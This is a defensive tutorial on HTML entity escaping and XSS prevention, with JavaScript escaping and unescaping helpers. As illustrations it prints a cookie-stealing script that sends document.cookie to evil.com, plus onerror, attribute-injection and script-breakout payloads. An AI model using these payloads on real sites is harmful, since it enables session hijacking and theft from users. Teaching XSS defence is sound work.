HTML Entities: Escaping, Unescaping, and XSS Prevention

Learn how HTML entity encoding works, why it's critical for security, and how improper handling leads to XSS vulnerabilities. Includes practical examples.

When you display user-generated content on a web page, you can't trust it. HTML entities are the first line of defense against cross-site scripting (XSS) attacks. This article explains what HTML entities are, how to escape and unescape them correctly, and why that matters for your application's security.

What Are HTML Entities?

HTML entities are sequences of characters that represent reserved or special characters in HTML. For example, `<` is written as `&lt;`, `>` as `&gt;`, `&` as `&amp;`, and `"` as `&quot;`. When a browser renders HTML, it displays each entity as the corresponding character but never interprets it as markup or code. This prevents injected markup from being executed.

Why Escape HTML?

Escaping (or encoding) HTML converts special characters into their entity equivalents. This is essential when inserting untrusted data into HTML contexts such as:

Inside element content (e.g., <div>{userInput}</div>)
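Inside attribute values (e.g., <a href="{userInput}">); for URL attributes such as href, also reject schemes like javascript:, which escaping leaves intact
Inside <script> or <style> blocks (though different rules apply: the browser does not decode entities there, so these contexts need their own encoding)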

If you skip escaping, an attacker can inject arbitrary HTML or JavaScript. For instance, a comment containing <script>alert('xss')</script> would run that script in the browser of every visitor who views the comment.

The Three Types of XSS

Understanding XSS helps you appreciate why escaping is critical:

Stored XSS: Malicious code is saved on the server (e.g., in a database) and served to all users. This is the most dangerous type.
Reflected XSS: The payload is in a URL or request parameter and reflected back immediately, often via search results or error messages.
DOM-based XSS: The vulnerability exists entirely in client-side JavaScript, where untrusted data modifies the DOM without server involvement.

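In every case, escaping untrusted data for the context it is inserted into prevents the browser from treating it as code. For DOM-based XSS, that protection has to live in the client-side code itself, for example by using innerText instead of innerHTML.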

How to Escape and Unescape HTML

Manual Escaping

You can replace characters manually using a lookup table:

Character	Entity
`<`	`&lt;`
`>`	`&gt;`
`&`	`&amp;`
`"`	`&quot;`
`'`	`&#39;`
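A minimal JavaScript sketch of the lookup-table approach follows. It assumes plain strings and no library; HTML_ENTITIES and escapeHtml are names chosen for this example. Matching all five characters with one regular expression replaces each character exactly once, which avoids the ordering problem of chained replacements (where `&` must be handled first).

```javascript
// The five mappings from the table: each special character maps to its entity.
// "&" is included so existing text like "&lt;" becomes "&amp;lt;" and
// displays literally instead of being decoded by the browser.
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Replace every special character in a single pass, so an "&" produced by
// one substitution is never re-escaped by another.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

console.log(escapeHtml(`<a title="Tom's">R&D</a>`));
// &lt;a title=&quot;Tom&#39;s&quot;&gt;R&amp;D&lt;/a&gt;
```

Because both quote characters are escaped, the output is usable in element content and in attribute values quoted with either `'` or `"`.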

Using JavaScript's `innerText` vs `innerHTML`

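Setting element.innerText = userInput inserts the value as plain text, so the browser never parses it as HTML (textContent behaves the same way). Avoid innerHTML with untrusted data, because it parses its input as markup.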

Server-Side Libraries

Most languages and frameworks provide built-in escaping: htmlspecialchars() in PHP, escape() in Python's html module, or the @ syntax in Razor views, which HTML-encodes output automatically.

Dedicated Tools

For quick conversions, use our HTML Entities Escape/Unescape tool. It handles both directions and supports all named entities.

Worked Example: Escaping User Comments

Suppose you have a comment system. A user submits:

Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

Without escaping, the rendered HTML becomes:

<p>Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script></p>

The script executes. With escaping, the output is:

<p>Great post! &lt;script&gt;fetch('https://evil.com/steal?cookie='+document.cookie)&lt;/script&gt;</p>

The browser displays the comment, including the <script> tags, as plain text, and the script never runs.

Common Pitfalls

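Double escaping: If you escape already-escaped data, `&amp;` becomes `&amp;amp;` and users see raw entity text. Escape once, at output time, and unescape only when you trust the source.
Wrong context: HTML escaping does NOT protect inside <script> tags or CSS. Use different encoding (e.g., JavaScript string escaping) for those contexts.
Attribute escaping: Always quote attributes and escape both " and '. Unquoted attributes are especially dangerous: a space ends the value, so input like x onmouseover=alert(1) adds a new attribute without using any character that HTML escaping changes.
Assuming library safety: Even popular WYSIWYG editors may need additional XSS filtering, and attackers can submit HTML without going through the editor at all. Always sanitize server-side before output.
Neglecting Unicode: Characters like \uFF1C (fullwidth less-than) can bypass naive filters if the application later applies Unicode normalization, since NFKC maps U+FF1C to <. Normalize before filtering or escaping, and use proper encoding libraries.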
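For the "Wrong context" pitfall, one common technique for data that must end up inside an inline <script> block is to serialize it with JSON.stringify and then replace <, > and & with their \u escapes, so the HTML parser never sees a closing </script> tag inside a string. This is a minimal sketch, not a complete templating solution; toScriptJson and window.__COMMENT__ are hypothetical names used only for illustration.

```javascript
// Serialize a value for embedding in an inline <script> block.
// JSON.stringify yields a valid JavaScript literal, but a string containing
// "</script>" would still end the script element early, so <, > and & are
// rewritten as \u003c, \u003e and \u0026. These characters can only occur
// inside JSON strings, where the escapes decode back to the same text.
function toScriptJson(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026");
}

// Hypothetical payload trying to break out of the script block.
const comment = { text: "</script><script>alert('xss')</script>" };
const page = "<script>window.__COMMENT__ = " + toScriptJson(comment) + ";</script>";

console.log(page);
// <script>window.__COMMENT__ = {"text":"\u003c/script\u003e\u003cscript\u003ealert('xss')\u003c/script\u003e"};</script>
```

In the browser, window.__COMMENT__.text holds the original string again, which should then be displayed with innerText rather than innerHTML.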

Security Implications: Beyond Basic Escaping

Escaping alone is not enough for rich content. You need a whitelist-based sanitizer that allows safe HTML tags and attributes while stripping dangerous ones. Libraries like DOMPurify (client-side) or Bleach (Python) do this, though Bleach has been deprecated since 2023.

Consider this attack vector: an attacker posts a comment containing an <img> tag with an onerror attribute, such as <img src=x onerror="alert(1)">. If you allow some HTML, you cannot escape < and >, so the tag is rendered, the image fails to load, and the onerror handler runs JavaScript. A sanitizer stops this by removing onerror, which is not on its whitelist.

Comparison: Escaping vs Sanitization

Approach	Pros	Cons
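Escaping	Simple, fast; prevents code execution in HTML element content and quoted attributes	Destroys formatting; no HTML allowed
Sanitization	Allows safe HTML; preserves rich content	Complex; risk of bypass if whitelist is incomplete
Both	Best security	Requires applying the right tool to each field: escape plain text, sanitize rich HTML, and never escape sanitized output (its tags would display as text)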

FAQ

What's the difference between HTML entities and URL encoding?

HTML entities encode characters for HTML contexts (e.g., `<` → `&lt;`). URL encoding (percent-encoding) converts characters for URLs (e.g., `<` → `%3C`). They serve different purposes and are not interchangeable.
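A link built from user input needs both encodings, each at its own layer. In this minimal sketch, query values are percent-encoded with the built-in encodeURIComponent, and the finished URL is then HTML-escaped for the href attribute. The /search path, the q and lang parameters, and the searchLink and escapeHtml helpers are hypothetical, written only for this example.

```javascript
// Small HTML escaper for this example (the five characters from the
// Manual Escaping table).
function escapeHtml(str) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Percent-encode each query value for the URL, then HTML-escape the
// complete URL before placing it in the href attribute.
function searchLink(query, lang) {
  const url = "/search?q=" + encodeURIComponent(query) + "&lang=" + encodeURIComponent(lang);
  return '<a href="' + escapeHtml(url) + '">Search</a>';
}

console.log(encodeURIComponent("<b>")); // %3Cb%3E
console.log(escapeHtml("<b>"));         // &lt;b&gt;
console.log(searchLink("fish & chips", "en"));
// <a href="/search?q=fish%20%26%20chips&amp;lang=en">Search</a>
```

The & inside the search term is percent-encoded as %26 and belongs to the URL, while the & that separates the two parameters becomes &amp; because it now sits inside an HTML attribute.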

Should I escape on the client or server?

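Escape wherever untrusted data is written into HTML, which for server-rendered pages means on the server, at output time. Escaping in the browser before submission is no protection, because an attacker can send requests to your server directly without running your JavaScript. Store data as submitted and escape it when rendering, since the right encoding depends on where the data ends up.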

Can I use `innerText` instead of escaping?

Yes. Assigning to innerText inserts the value as plain text, so the browser never parses it as HTML. That also means it only suits plain text content; for rich HTML, use a sanitizer.

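What is `&amp;` and why does it appear?

`&amp;` is the entity for `&`. If you see `&amp;` in rendered text, the data was escaped twice: the original `&` became `&amp;` on the first pass, and the second pass turned that into `&amp;amp;`, which the browser displays as `&amp;`. Remove the extra escaping step so data is escaped exactly once; unescaping to compensate is only safe when you trust the source.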
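The effect is easy to reproduce. This minimal sketch uses a hypothetical escapeText helper that handles only the characters that matter in element content, chaining one replacement per character. It replaces & first, because doing it last would re-escape the & in every &lt; and &gt; it had just produced.

```javascript
// Minimal escaper for element content. "&" must be replaced first:
// replacing it last would turn the "&lt;" just produced into "&amp;lt;".
function escapeText(str) {
  return str
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

const original = "Fish & Chips";
const once = escapeText(original); // correct: the browser shows "Fish & Chips"
const twice = escapeText(once);    // double-escaped: the browser shows "Fish &amp; Chips"

console.log(once);  // Fish &amp; Chips
console.log(twice); // Fish &amp;amp; Chips
```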

How do I unescape HTML entities in JavaScript?

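Parse the string with DOMParser and read the resulting document's textContent:

function unescapeHtml(str) {
  // DOMParser builds an inert document: scripts do not run and images do not
  // load, so input such as <img src=x onerror=...> cannot execute here.
  // Setting innerHTML on a detached element, by contrast, can still fire onerror.
  const doc = new DOMParser().parseFromString(str, 'text/html');
  // textContent returns the decoded text with all tags stripped.
  return doc.documentElement.textContent;
}

Because this uses the browser's own HTML parser, it decodes every named and numeric entity the browser recognizes. The result is untrusted plain text: display it with innerText or textContent, never innerHTML.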
